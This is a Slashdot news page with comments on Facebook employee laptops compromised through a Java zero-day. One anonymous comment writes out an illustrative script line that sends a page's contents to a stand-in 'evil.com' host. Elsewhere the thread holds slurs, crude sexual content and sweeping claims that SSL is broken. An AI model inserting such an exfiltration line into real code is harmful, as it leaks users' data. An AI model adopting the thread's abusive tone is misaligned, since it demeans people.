×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Facebook Employees' Laptops Compromised; User Data Believed Safe

timothy posted about a year ago | from the safely-exploited-by-facebook dept.

Facebook 75

Trailrunner7 writes "Laptops belonging to several Facebook employees were compromised recently and infected with malware that the company said was installed through the use of a Java zero-day exploit that bypassed the software's sandbox. Facebook claims that no user data was affected by the attack and says that it has been working with law enforcement to investigate the attack, which also affected other unnamed companies. Facebook officials did not identify the specific kind of malware that the attackers installed on the compromised laptops, but said that the employee's machines were infected when they visited a mobile developer Web site that was hosting the Java exploit. When the employees visited the site, the exploit attacked a zero-day vulnerability in Java that was able to bypass the software's sandbox and enable the attackers to install malware. The company said it reported the vulnerability to Oracle, which then patched the Java bug on Feb. 1."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

75 comments

thats what happens when (2, Insightful)

Anonymous Coward | about a year ago | (#42921583)

you use windows as your dev environment

Re:thats what happens when (0, Flamebait)

Anonymous Coward | about a year ago | (#42921617)

thats what you use windows as your dev environment

why was this modded down? looks like the m$ faggots are around today

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42921727)

you must be new here..

Re:thats what happens when (1)

Anonymous Coward | about a year ago | (#42921771)

or perhaps it's because the comment was trolling?

Re:thats what happens when (1, Insightful)

drankr (2796221) | about a year ago | (#42921849)

How was it trolling? Why doesn't the article state what OS those laptops were running? Hmm? Because it's the most insecure OS known to mankind, Windows, and it doesn't even have to be said any longer? Or because the writers are pathetically unprofessional and are deliberately withholding the facts here? Either way, I don't know.

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42921935)

The article clearly says that the exploits they were using work against Windows and Mac - together that is, oh I don't know, 98.5% of notebooks out there. So yes, they were using notebooks. The notebooks were vulnerable because they had Java enabled in the browser. Who cares if it was Windows or Mac? We know it wasn't Linux because a) they successfully attacked it and the attack was not crafted for Linux, and b) relatively nobody uses Linux. Duh.

Yet another Twitter Sockpuppet. (0)

Anonymous Coward | about a year ago | (#42922777)

Looking at the UID, almost 3M. Check
Obsessive hatred and FUD against Microsoft. Check
All that is missing is M$.

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42922065)

I hate knowingly admitting this therefore I am ACing it.

They use Macs, this case it would of been a MacBook.

Re: thats what happens when (3, Informative)

cyber-vandal (148830) | about a year ago | (#42922119)

It's "would have" you ignorant moron.

Re: thats what happens when (-1)

Anonymous Coward | about a year ago | (#42922303)

go fuck a beehive asshole

Re: thats what happens when (2, Funny)

Anonymous Coward | about a year ago | (#42922637)

What's a "beehive asshole"?

Re: thats what happens when (0)

Anonymous Coward | about a year ago | (#42925349)

Beehive
When your doing a girl from the ass, and before you cum you pull out and cum into her hair, and then with your penis you twirl her hair into a sticky hairdo resembling a beehive

while doing the prostitute in the anus i gave her a good ol' american Beehive!

Source http://www.urbandictionary.com/define.php?term=beehive [urbandictionary.com]

Re: thats what happens when (0)

YeeHaW_Jelte (451855) | about a year ago | (#42922861)

English might not be his first language, you don't have to be rude.

Re: thats what happens when (1)

cyber-vandal (148830) | about a year ago | (#42930961)

It's a common piece of UK English fuckwittery from semi-literate fuckwits who don't know their own language.

Re: thats what happens when (1)

greenfruitsalad (2008354) | about a year ago | (#42943985)

english IS his first language. nobody who learned english as their second language would write "would of". this is similar to "they're, their, there" type of mistake. only native speakers have a problem with this.
first time i came across "would of", i had to look it up on google.

Re: thats what happens when (0)

Anonymous Coward | about a year ago | (#42926973)

Stop modding grammar nazism up! Yes, the comment is correct, but it is entirely irrelevant.

It's good they'll protect your data from thieves.. (4, Insightful)

Anonymous Coward | about a year ago | (#42921597)

but who's gonna protect people's data from Facebook itself?

Re:It's good they'll protect your data from thieve (1)

oztiks (921504) | about a year ago | (#42922085)

A photo of the hacker planting the malware can be found here [yaaree.com] .

Safe? (5, Insightful)

DoofusOfDeath (636671) | about a year ago | (#42921599)

Given Facebook's MO, users should assume that anything Facebook, Inc. had access to is already in the hands of people you can't trust.

Them being hacked is pretty irrelevant.

Re:Safe? (1)

elucido (870205) | about a year ago | (#42921629)

Are you accusing Mark Zuckerberg of being a hacker?

Re:Safe? Sure ! (0)

Anonymous Coward | about a year ago | (#42921765)

No just someone that exploits the people's ignorance for his benefit.
And the greatest spy in modern history. All that data is the hands of the
American secret services. Thanks to him , the USA is safe. ! .

.

   

Re:Safe? (5, Funny)

KiloByte (825081) | about a year ago | (#42921835)

Are you accusing Mark Zuckerberg of being a hacker?

No, most hackers can be expected to have some basic integrity.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42921883)

Please tell me where in that statement you got the idea he was implying Zuckerberg is a hacker. Even using the popular, but incorrect, definition of hacker does not apply here as Mark Zuckerberg owns Facebook and I'm sure he has no need to "hack" into the system to get at any information he wants.

Re:Safe? (1)

oztiks (921504) | about a year ago | (#42922033)

Hacker Way, Hacker-Freakin-Way ...

He just made real hackers around the world cringe after he did that.

Re:Safe? (1)

History's Coming To (1059484) | about a year ago | (#42922261)

"Owns" != "Has a right to the data". If the CEO of a major bank wanted to see every purchase his ex-wife makes he can't just call the data up, any sensible company will have need-to-know policies in place to prevent abuse and afford some deniability, regardless of how high up the request comes from. I don't doubt a bank CEO could get access to his ex-wife's data, but I'd be very surprised if any company would admit that policy is simply to hand over any data to the bloke in charge without any control or oversight.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42923009)

"Not having a right to the data but still having access to it" != "hacking" anymore than considering a janitor of a building a lockpicker if he has a master key and goes into a room he's been told to stay out of. It may get him in trouble, but he did not break into the room.

Re:Safe? (2)

Runaway1956 (1322357) | about a year ago | (#42922755)

Zuckerberg has successfully social-engineered about half the people in the US. Social engineering is a hacker skill, isn't it? People fall all over themselves to provide Zuck with their personal details.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42923069)

Interesting way to look at it and something I didn't consider. However, even though that would apply to the overall picture of FaceBook, going back to the OC, it doesn't apply to my original question.

Re:Safe? (1)

oztiks (921504) | about a year ago | (#42922019)

What's more disconcerting is the incident being made public now. Why a month after the incident occurring? Are they afraid of an Anonymous Hacktivism style attack? are they trying to spare embarrassment of critical systems that may of been impacted?

They did speak of source code snippets and internal emails being on these particular laptops, TBH, that's worse than what Sally did on the weekend IMHO.

And the blame China point, another case of "here we go again", what is inferred by bringing this up?

Re:Safe? (1)

tlhIngan (30335) | about a year ago | (#42936027)

Well, if you meant to keep it private, why did you post it online for the world to see?

Oh, right, so-called "privacy" controls. Which are a brilliant social engineering hack meant to extract more information from users who wouldn't otherwise readily give it up. Unless you can control all your friends, anything they can see, the world can see. All it takes is someone to re-post it, or mention it or something and the beans are spilled.

Truth is, anything you post online is public. As someone's very famous sister found out when one of her "friends" re-posted a family photo and put it up on Twitter as well.

Sorry, the old adage is still true - don't put online stuff that you want to remain private. And stuff that ends up on the internet, stays on the internet.

Wait, this increased security? (2)

squiggleslash (241428) | about a year ago | (#42921601)

Facebook's users finally have privacy because someone got in and hacked into Facebook's laptops? What did they do, disable the graph API?

Re:Wait, this increased security? (2)

oztiks (921504) | about a year ago | (#42922109)

The word on the street is that they tied FB profile authentication in with their lobby entrance security systems, so unless you have a FB profile you can't enter the building.

No user data was compromised (5, Funny)

2phar (137027) | about a year ago | (#42921605)

Well, that's good to know. I'd hate to think of all those sensitive personal data falling into the hands of some evil corporation that would exploit it to make money with no concern for the privacy of the people involved.

Re:No user data was compromised (1)

Barsteward (969998) | about a year ago | (#42921693)

I want to know how they can say for sure that none of the data was lifted of the computers

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42921743)

They stripped the systems of any copy instruction. Only moves are allowed.

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42922059)

Hopefully, either because (1) there was no user data ON the computers in the first place, or (2) what data was there was encrypted.

TFA leaves both of these possibilities open.

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42921695)

Probably the laptop's user data, not facebook user data, I find it hard to believe they'd carry that in a laptop.

Hmm, actually, thinking about it, they might be stupid enough to do it. After all, a company that makes the it's money entirely on the internet and has such weak training for their staff, wouldn't be a stretch.

Re:No user data was compromised ( of course ) (0)

Anonymous Coward | about a year ago | (#42921741)

That would be totally unacceptable now would it ? Of course our data is safe of falling into the wrong hands.
Goes without saying. They would never lie about a major data breach.

ahhhhhhhhhh .. the smell of fresh bullshit in the morning hmmm mmmm ;)

Re:No user data was compromised (1)

Nidi62 (1525137) | about a year ago | (#42921825)

The data might be safer with hackers than it is with the corporations Facebook sells it to

User data should never be decrypted. (2, Interesting)

elucido (870205) | about a year ago | (#42921625)

I don't see why it would be so difficult to keep user data safe. Keep it encrypted, use a VPN, stream the data to memory but never store any of it unencrypted.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921683)

You do not see why it would be so difficult... No offense, but people who think like you are usually part of the problem, not the solution.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921753)

Bull Shit!

I get that it's hard, but it isn't impossible. And most importantly, people who think like you are the problem (not part, the whole thing). Given the number of hacks, vulnerabilities, social engineering, and just plan EVIL in recent computer company history, it should be a company's number one responsibility to keep user data safe. Through whatever means available.

1) Client data should never be on employee computers
2) Client data should never be accessible by employee computers
2a) If this is not possible, it should be never allowed on computers that the employee has any real control over. Put it on a machine that the employee has access to, but make it difficult

Re:User data should never be decrypted. (1)

History's Coming To (1059484) | about a year ago | (#42922305)

Exposing user data is what Facebook's business is, just in a controlled manner depending on how much info or money you give them. Clients (eg advertisers), well that's a different matter, but this was user data, not client data.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921763)

I don't see why it would be so difficult to keep user data safe. Keep it encrypted, use a VPN, stream the data to memory but never store any of it unencrypted.

If you sit down and list the facebook use cases (including who needs access to, say, your photos), you'll quickly realize why what you said won't work.

Re:User data should never be decrypted. (1)

phantomfive (622387) | about a year ago | (#42922465)

Is there any company in the world that encrypts more than password/CC numbers? I don't think many companies do that....

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42922911)

Look, I get your philosophical premise, but let's be a little serious here....

Where do you recommend the key be stored? How much extra CPU time is this worth? Every single system will need the key in memory, and it'll have to be the same key.

Now let's get really pragmatic. This is going into document databases.

Things need keys (not crypto) for the docs. If the whole database is encrypted, building indexes gets /weird/ -- they're guaranteed to be well distributed, but sharding gets funky really fast. There are ways to rectify that, but it's really not even worth the time it takes to discuss them.

Then we've got the fact that people need to query, run fast string operations in-database, andt the fact that you know... the application servers need the raw data to actually fucking... compute on. (Computation, you do do that motherfucker, right?)

"Should never be decrypted" Why don't we just throw it out then, since we never do anything with it. Laugh.

I don't know why you got any interesting/insightful moderation -- your proposal at a literal level is useless.

The query interface, ORM, app server, reporting systems all need decrypted data. Or do you think the webpage shouldn't be able to retrieve your name and friends?

No matter how encrypted your database is, retrieval of decrypted info still comes down to 'select * from users;"

Yes, there's...ways to improve on this, partial tables, encrypted tables with some info, nega-databases, and homomorphic encrypted operations. I'm sure every single one of your developers has a PhD and is intimately familiar with zero knowledge proofs and protocols? No...? Well then, shaddup. No, you can't even train them or give them the papers to read -- they'll implement it wrong.

But the bottom line is most encryption only protects data at rest. Stone cold rest in a drive that's powered off. Anything else -- we can get to. I don't mean hackers. I mean remotely competent sysadmins, devs, devops -- even management with a properly written disaster recovery document.

You're probably the same type of person that told me my application, its data, and its caches had to be encrypted so that I as the developer and sysadmin couldn't get to the ever so precious customer data.

Yeah, I could encrypt it, I could make it harder, I could make it more secure (and when presented with a quote to do exactly that people bawked, bitched, moaned, and said no). But you really can't secure your data against the sysadmin and developer. You can audit their access of it. But if they want it, or somebody impersonating them wants it -- and if the have any capability to impersonate a client or set a debug flag on production ... they can get it.

You don't see why it should be so difficult...

Do you see anything about development? Have you ever written a program? Hell, have you ever used a freaking program in a client-server relationship -- and if so, has it ocurred to you that you could replace the program with another one?

Re:User data should never be decrypted. (1)

elucido (870205) | about a year ago | (#42923563)

Yes, there's...ways to improve on this, partial tables, encrypted tables with some info, nega-databases, and homomorphic encrypted operations. I'm sure every single one of your developers has a PhD and is intimately familiar with zero knowledge proofs and protocols? No...? Well then, shaddup. No, you can't even train them or give them the papers to read -- they'll implement it wrong.

But that is the direction we should be going. If it's implemented wrong then the buggy code will be fixed and eventually it will be implemented right. It should be done and the only excuse you have not to do it is that it would cost too much in CPU resources or be too hard. What is more important than user data? The user is most important and the user data is sacred. That has to be protected and it's Facebook with their goddamn lax policies that help destroy the foundation of the internet itself.

But the bottom line is most encryption only protects data at rest. Stone cold rest in a drive that's powered off. Anything else -- we can get to. I don't mean hackers. I mean remotely competent sysadmins, devs, devops -- even management with a properly written disaster recovery document.

Encryption protects data in transmission over the internet all the time. When you transmit your credit card information it's encrypted via https/ssl. Asymmetric encryption also protects data fairly well. Fully homomorphic encryption is new but a company like Facebook has enough resources to start work on a practical implementation. The problem right now is it's incredibly slow and not very optimized but that could change.

Your argument is that you can't train people to understand certain things or that there aren't programmers who can implement it? That is complete and utter bs. Facebook has the money and can hire whoever they want to hire and if you pay someone 100k a year to study and program it then I'm certain they could. It's complicated but it's not so complicated that you couldn't study it and be trained. So I say why not study it? Oh yeah, because Facebook doesn't seem to care about privacy, about user data security, about encryption, when they released they weren't even using https!

Btw yes I have written programs and I know about the client server relationship. I also know enough about encryption to know that you actually CAN secure a laptop. If the data is stored elsewhere such as in the cloud and connected to via VPN and that connection is closed off and encrypted, that would be a start, but the best solution is not to give employees access to user data from their laptop. Go to the office where we can monitor every employee on every computer and where we can at least filter stuff like Java and other malware so it does not contaminate the environment. Letting anyone connect their laptop to the network then take it home and then on top of that allowing Java to run on it ? Just plain stupid. They should have removed Java and everything not absolutely required for the task.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42923915)

I think you missed a lot here...

The user is most important and sacred. Unfortunately, you as an individual logging into facebook are *a* user, but not *the* user... you're the marketed demographic sold to advertisers.

So yeah... you're right, facebook doesn't care about your privacy. And they shouldn't.

That it costs too much CPU is less relevant -- I have built in crypto in every processor I've purchased in the past five years. However, most software engineers aren't competent enough to use it correctly.

As for encryption protecting data in transmission all the time. You're...basically only barely techincally correct. Asymetric encryption is slow, but that's irrelevant -- first, there's been huge speed boosts with ECC, secondly that's what TLS and secret key exchange is for...

HTTPS/SSL has been dead as far as I've been profesionally concerned since 2001. If you believe otherwise, it's really just... further proof that the average or better than average programmer shouldn't be touching crypto, especially given that you are clearly at least literate in the field.

There's been COTS products for even private industry to break it since at least 2005. I even bought one once. You call it protected -- and yeah, you're vacuously correct, it's encrypted and meets all of the definitions and standards that were appropriate, providing semantic security within a non-neligible margin of the keyspace (ignoring things like BEAST entirely for now). Unfortunately, the standards don't actually protect against /anything/ but a naive man-in-the-middle and brute force. They don't even provide a chain of trust through the CA. Calling HTTPS "protected" is borderline negligence.

You know enough about encryption to know that you can secure a laptop? Really? Every definition of security that I've ever considered applicable, security means the absence of risk. Which means all you can do is mitigate risk to a laptop. Risk of what? Maybe you've got a military background where "secure" means "threat mitigation" -- I don't want to quibble that point. But you can't eliminate all threats to a laptop.

Stop. No, you can't. If you think you can't, you don't know enough.

If you think you can do it with cloud hosting, remote encryption, VPN clients and anti virus -- you don't know enough.

If you think you can do it by locking down the admin account, you don't know enough.

If you think you can do it with three bios passwords, DRM, secure boot over UEFI -- you still don't understand enough. They've already been defeated. All of them.

Yeah, I'm serious.

This is facebook. These people are fucking software developers. Very skilled ones. Nevermind all the corp best practice in the world -- a few of them actually need a debugger and the ability to run mv eax, ebx -- there you go -- DRM circumvented.

You want to 'filter' and monitor Java? Good fucking luck with the 64 odd exploits released in the past week. You're gonna have to ban all of it. And flash, pdf, word, html, most mime encodings. Should I keep going? I've seen attacks directed against actual IPS and log analysis sytems....

You want to run and IDS/IPS? OK -- here's your two choices:

1) SSL goes through it, I can bypass it by delivering over SSL
2) You inspect SSL -- thus decrypting the data. Congrats, your IPS is now a very valuable target.

My argument isn't remotely BS. There's probably a dozen programmers in the world good enough to do crypto totally correctly. Facebook could hire them. Facebook could train them -- and guess what, it /still wouldn't matter/ Because some fuckup developer somewhere would use it wrongly and weaken the entire platform.

You want to assert there's 50, 100, 1000....? Fine. This is security -- it takes one damned hole.

You want to dream of their nega-database with homomorphic encrypted operations? Of some brilliant utopian star trek future with near ubiquitous computing, proper interfaces, abstractions, a world where managers don't screw the pooch by omitting a few details or demanding that you remove footnotes from documentation that might make things look bad the wall street journal?

Awesome, beautiful fucking dream. Thanks for spending a billion bucks on it.

Even when you're completely done, I'm still a programmer. I'm still a programmer with a compromised laptop. I'm still a guy with access to version control. And all I need to do as the bad guy is insert a script tag that reads...

$.ajax(http://evil.com/submit, document.innerhtml);

I can't steal the database, but in the limit I still have every single user account and whatever the heck I want, because sooner or later encrypted data gets decrypted.

Thanks for playing. I'll be back in a week.

When a developer or syadmin system is compromised, /no amount of encryption/ will solve your problem. And marketing crypto to stop it is irresponsible.

For the record, yeah, I agree -- we should be improving crypto and especiailly the zero-knowledge algorithm portion.

But improving it won't make the problem we're talking about go away. And it won't even mitigate it. It'll just make a compromise of a database server or storage server slightly less risky.

LIKE! (0)

Anonymous Coward | about a year ago | (#42921647)

I bet someone beat my score at Bejeweled Blitz, too!

law enforcement? (0)

Anonymous Coward | about a year ago | (#42921675)

So people call the police when they get a computer virus now? Losers, get off the internet.

Useless articles (4, Insightful)

Anonymous Coward | about a year ago | (#42921707)

What's the point of these articles that announce that so and so company's systems have been hacked? They never contain any forensic information about the exploits other than to loosely identify the vulnerable software the bad guys used to get into the system. No identification of the malware installed, no identification of the OS's the laptop were running, no identification of any antivirus products that turned out to be completely useless in stopping the attacks. IOW, no goddamn information that would be useful to anyone who wanted protect themselves from attack, or at least detect whether their system were already compromised.

The lack of forensic details about the attack provided by Facebook or any of the other companies hit with the java exploit causes great doubt about their claims that no user data was accessed.

Re:Useless articles (0)

Anonymous Coward | about a year ago | (#42921761)

What's the point of these articles that announce that so and so company's systems have been hacked? They never contain any forensic information about the exploits other than to loosely identify the vulnerable software the bad guys used to get into the system. No identification of the malware installed, no identification of the OS's the laptop were running, no identification of any antivirus products that turned out to be completely useless in stopping the attacks. IOW, no goddamn information that would be useful to anyone who wanted protect themselves from attack, or at least detect whether their system were already compromised.

The lack of forensic details about the attack provided by Facebook or any of the other companies hit with the java exploit causes great doubt about their claims that no user data was accessed.

To fuel the public fear and increase the budget for the "cyberwar"....... haha
It's all fake.

Re:Useless articles (0)

Anonymous Coward | about a year ago | (#42922309)

Facebook are listed on NASDAQ.

NASDAQ Listing Rule 5250(b)(1) requires that, except in unusual circumstances, the company shall make prompt disclosure to the public through any Regulation FD-compliant method (or combination of methods) of disclosure of any material information that would reasonably be expected to affect the value of its securities or influence investors' decisions.

In other news (1)

houghi (78078) | about a year ago | (#42921799)

A man gave way to a car and no accident happened.

Are we in such a bad shape that NOT compromising personal data has become the news worthy factor?

"zero day" is as bad as l337 speak (3, Interesting)

Anonymous Coward | about a year ago | (#42921805)

Can we all stop saying zero day? it's just an attempt to sound cool and hackish and it means nothing. it's a vulnerability, and it has an exploit and no patch is available, as opposed to unpatched.

if they release new software that they brag is secure, and you have an exploit that already compromises a vuln, ok, you have a zero day because that's day one of something. then it makes sense. otherwise, it's false street cred and bravado.

Re:"zero day" is as bad as l337 speak (0)

Anonymous Coward | about a year ago | (#42922097)

1t's, 0dayz spl0it j00 n3wb!

Re:"zero day" is as bad as l337 speak (1)

Anonymous Coward | about a year ago | (#42924797)

You might not be old enough, but "zero day" originally meant that software was cracked and distributed via BBS on the same day it was released. That is what zero day meant. Zero-day warez was the status groups like Quartex and Fairlight aspired to achieve.

THAT is what zero day meant.

Re:"zero day" is as bad as l337 speak (0)

Anonymous Coward | about a year ago | (#42925929)

That IS old! Now if you can't break the street date, its late.

How about embbeded devices (1)

Anonymous Coward | about a year ago | (#42921829)

Ok, Java is hosed, most of Adobe is hosed etc...

But has anybody ever considered the dangers of embedded linux devices in a company? Some of these things are pretty powerful with the right ARM socket, shady firmware and make the perfect backdoor in whatever corporate infrastructure. It's not that everybody is equipped with the latest firewall, the latest IDS or latest Layer 7 proxy or DPI on SSL and even then, DPI on SSL or Layer7 proxies can be performance hogs in a time that end users want to have a webpage loaded in 0.0000001 seconds. /conspiracy-theory: Make some overhyped BIG Ltd with cheap embedded solutions, send demo units to the whole world and your backdoor/botnet is in place. Don't put a real backdoor in it, just make it 'vulnerable' and if someone would find an exploit, patch it, like the good guys, and introduce another one.

Hey Timothy, how does Zuckerberg's cock taste ? (0, Insightful)

Anonymous Coward | about a year ago | (#42921881)

SMART people don't use Facebook and smart people ARE NOT INTERESTED
IN FACEBOOK.

How much does Facebook PAY you sorry dickeating morons to continue
to post drivel about Facebook every fucking day ?

Do us all a favor, Timothy, and drink some Drano.

Re:Hey Timothy, how does Zuckerberg's cock taste ? (-1)

Anonymous Coward | about a year ago | (#42922043)

"dickeating morons to continue to post drivel"

Mod parent redundant.

people still run java apps in browsers? (0)

Anonymous Coward | about a year ago | (#42921885)

Seriously? Why would anyone in this day and age run unknown and untrusted programs from the internet, even in a so-called "sandboxed" environment? It's long past time to disable java, javascript, (and ActiveX back when that was a thing) by default. Not doing this seems to be the cause of a large fraction of all the pwnage that people end up subjected to.

Have we learned nothing from the last decade?

How's your fancy pants coding parties now? (1)

Anonymous Coward | about a year ago | (#42921941)

Turns out Facebook employees don't know what the fuck they're doing. Keep drinking the beer, at least that'll give you good memories later in life.

Check their closets? (0)

Anonymous Coward | about a year ago | (#42922191)

Maybe they'll find a Harvard staff sneaking out, covering their face with a bicycle helment? Or would that be a zombie process?

Isn't the bigger news... (2)

amightywind (691887) | about a year ago | (#42922427)

That Facebook paid no taxes in 2012 and will receive a $400 million refund. Hypocritical liberal scum.

DD-MM-YYYY (-1)

Anonymous Coward | about a year ago | (#42922495)

Not "Feb 1". I'm so sick of this US-Centric bullshit.

oh the irony (1)

milkmage (795746) | about a year ago | (#42922515)

http://arstechnica.com/security/2013/02/at-facebook-zero-day-exploits-backdoor-code-bring-war-games-drill-to-life/ [arstechnica.com]

"The FBI e-mail, zero-day exploit, and backdoor code, it turns out, were part of an elaborate drill Facebook executives devised to test the company's defenses and incident responders. The goal: to create a realistic security disaster to see how well employees fared at unraveling and repelling it. While the attack was simulated, it contained as many real elements as possible."

I'm glad that on Facebook... (0)

Anonymous Coward | about a year ago | (#42922899)

I'm glad that on Facebook, I use a fake name, and only a small group of close friends know about it.

Who cares? (2)

ilsaloving (1534307) | about a year ago | (#42923447)

Your data was spread across the 4 winds as soon as you started using Facebook.

The only "problem" here is that your data has now been around the globe without Facebook getting to monetize the transaction.

"User Data Safe" (3, Insightful)

Mark Rawls (2648691) | about a year ago | (#42923875)

I think that's the first time that the phrases "user data believed safe" and "Facebook" have been uttered in the same sentence.
Check for New Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...